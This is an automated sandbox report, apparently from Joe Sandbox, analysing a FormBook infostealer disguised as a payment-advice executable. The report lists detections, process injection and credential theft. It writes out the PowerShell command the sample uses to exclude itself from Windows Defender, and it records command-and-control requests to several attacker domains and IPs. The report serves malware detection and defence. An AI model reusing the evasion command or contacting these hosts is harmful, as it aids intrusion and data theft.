Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe

Overview

General Information

Sample name:Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
Analysis ID:1571277
MD5:cedbf1d5c1bc7d923f885cd24bf225c1
SHA1:dd0e1b5cd5b14488e1f28ad127d5cd5e484a5ba2
SHA256:58b21b1ecb14e234c09d14eb1a987f636f384ff0e1345bde2071bb87e90ae5d8
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe (PID: 1740 cmdline: "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe" MD5: CEDBF1D5C1BC7D923F885CD24BF225C1)
    • powershell.exe (PID: 7304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe" MD5: CEDBF1D5C1BC7D923F885CD24BF225C1)
      • vTCmFjyxUmdTJX.exe (PID: 3756 cmdline: "C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • finger.exe (PID: 7720 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • vTCmFjyxUmdTJX.exe (PID: 4136 cmdline: "C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7932 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.2236251999.00000000019C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.3552776156.0000000003770000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.3552721887.0000000003720000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", ParentImage: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, ParentProcessId: 1740, ParentProcessName: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", ProcessId: 7304, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", ParentImage: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, ParentProcessId: 1740, ParentProcessName: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", ProcessId: 7304, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", ParentImage: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, ParentProcessId: 1740, ParentProcessName: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe", ProcessId: 7304, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T08:49:05.514764+010020507451Malware Command and Control Activity Detected192.168.2.449768172.247.112.16480TCP
                2024-12-09T08:49:30.831726+010020507451Malware Command and Control Activity Detected192.168.2.44983013.248.169.4880TCP
                2024-12-09T08:49:46.022760+010020507451Malware Command and Control Activity Detected192.168.2.449868156.253.8.11580TCP
                2024-12-09T08:50:02.120683+010020507451Malware Command and Control Activity Detected192.168.2.44990837.97.254.2780TCP
                2024-12-09T08:50:17.301606+010020507451Malware Command and Control Activity Detected192.168.2.449947199.193.6.13480TCP
                2024-12-09T08:50:34.231659+010020507451Malware Command and Control Activity Detected192.168.2.449990149.104.34.13480TCP
                2024-12-09T08:50:49.794564+010020507451Malware Command and Control Activity Detected192.168.2.450029124.6.61.13080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeReversingLabs: Detection: 65%
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeVirustotal: Detection: 38%Perma Link
                Source: Yara matchFile source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2236251999.00000000019C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3552776156.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3552721887.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3552365141.00000000014E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2236407879.0000000002F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeJoe Sandbox ML: detected
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234307143.0000000001147000.00000004.00000020.00020000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000002.3552384724.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vTCmFjyxUmdTJX.exe, 00000008.00000002.3551724972.000000000077E000.00000002.00000001.01000000.0000000C.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000000.2305994823.000000000077E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000009.00000003.2234352082.000000000366C000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000009.00000003.2236364471.0000000003813000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000009.00000003.2234352082.000000000366C000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000009.00000003.2236364471.0000000003813000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234307143.0000000001147000.00000004.00000020.00020000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000002.3552384724.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F5C9E0 FindFirstFileW,FindNextFileW,FindClose,9_2_02F5C9E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then xor eax, eax9_2_02F49E40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then mov ebx, 00000004h9_2_038604E8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49768 -> 172.247.112.164:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49830 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49868 -> 156.253.8.115:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49908 -> 37.97.254.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49947 -> 199.193.6.134:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49990 -> 149.104.34.134:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50029 -> 124.6.61.130:80
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 37.97.254.27 37.97.254.27
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: TRANSIP-ASAmsterdamtheNetherlandsNL TRANSIP-ASAmsterdamtheNetherlandsNL
                Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /tvkp/?q0C=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&0vE=z2LXL2HhYNX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.jgkgf.clubConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /09b7/?q0C=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&0vE=z2LXL2HhYNX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.hsa.worldConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6t0f/?q0C=MY8WJ01352TVXzFsNodd1NxUli1E4sLIDPBPQPgfoKZiJVfQ3vqQHTL/6etRwfvFnZBRJEUa5B9wCMX79XLhBfQQAkU843AvbtgeEKbWrrYxtYrhlbwkADc=&0vE=z2LXL2HhYNX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.sssvip2.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7ujc/?q0C=WvCg6J2jHD6L/TcyvzGm/cLTtunIwZsLDJOR2qctLrwbpbWmV0+8HmEyzKPQy50wJfwN5AO63TK9GRaTVCmcnK6BZOflUZJxlriydXV/Hhy/YqFf922rQpM=&0vE=z2LXL2HhYNX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.dutchdubliners.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rdvg/?q0C=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&0vE=z2LXL2HhYNX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.allstary.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ah82/?q0C=ZJEy2f+tUkBEF+w+scawLBB5zJTblKgdMgFXComG0qR9kHSC6PuhPC8uHAjvWDylpvj6Mcz0IvFDuxOLTDxJzlfpwwLacPhih5HaTILNLTJtkK4jcOiAtOE=&0vE=z2LXL2HhYNX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.16v9tiu00r.inkConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hmf8/?0vE=z2LXL2HhYNX8&q0C=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.comect.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.jgkgf.club
                Source: global trafficDNS traffic detected: DNS query: www.hsa.world
                Source: global trafficDNS traffic detected: DNS query: www.sssvip2.shop
                Source: global trafficDNS traffic detected: DNS query: www.dutchdubliners.online
                Source: global trafficDNS traffic detected: DNS query: www.allstary.top
                Source: global trafficDNS traffic detected: DNS query: www.16v9tiu00r.ink
                Source: global trafficDNS traffic detected: DNS query: www.comect.online
                Source: global trafficDNS traffic detected: DNS query: www.emirates-visa.net
                Source: unknownHTTP traffic detected: POST /09b7/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,enHost: www.hsa.worldOrigin: http://www.hsa.worldContent-Length: 200Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.hsa.world/09b7/User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36Data Raw: 71 30 43 3d 39 52 4c 34 4a 48 6f 6c 2f 6c 56 69 46 45 59 61 68 58 4b 42 4a 71 55 52 54 36 4a 52 45 39 56 50 79 44 41 33 6d 79 39 33 45 44 2f 59 45 4c 6c 34 36 35 4d 43 48 32 39 6a 57 57 66 46 5a 78 48 64 76 44 76 71 58 64 4c 38 51 6b 4f 6c 58 43 38 2b 34 4a 4a 75 71 46 35 6e 63 77 39 65 73 4b 57 51 4c 71 72 30 63 76 6c 6a 72 6f 36 66 6a 62 69 41 59 4e 42 6a 4d 49 57 50 76 44 68 4d 61 37 53 30 66 37 67 62 45 6f 6e 6e 49 59 53 59 56 32 6c 54 42 7a 62 79 55 33 76 58 31 74 54 62 4e 53 4f 62 53 4f 32 79 69 34 4c 63 73 72 47 67 53 6e 7a 58 70 76 45 32 4f 59 41 54 31 78 69 4c 6f 64 49 58 57 77 3d 3d Data Ascii: q0C=9RL4JHol/lViFEYahXKBJqURT6JRE9VPyDA3my93ED/YELl465MCH29jWWfFZxHdvDvqXdL8QkOlXC8+4JJuqF5ncw9esKWQLqr0cvljro6fjbiAYNBjMIWPvDhMa7S0f7gbEonnIYSYV2lTBzbyU3vX1tTbNSObSO2yi4LcsrGgSnzXpvE2OYAT1xiLodIXWw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
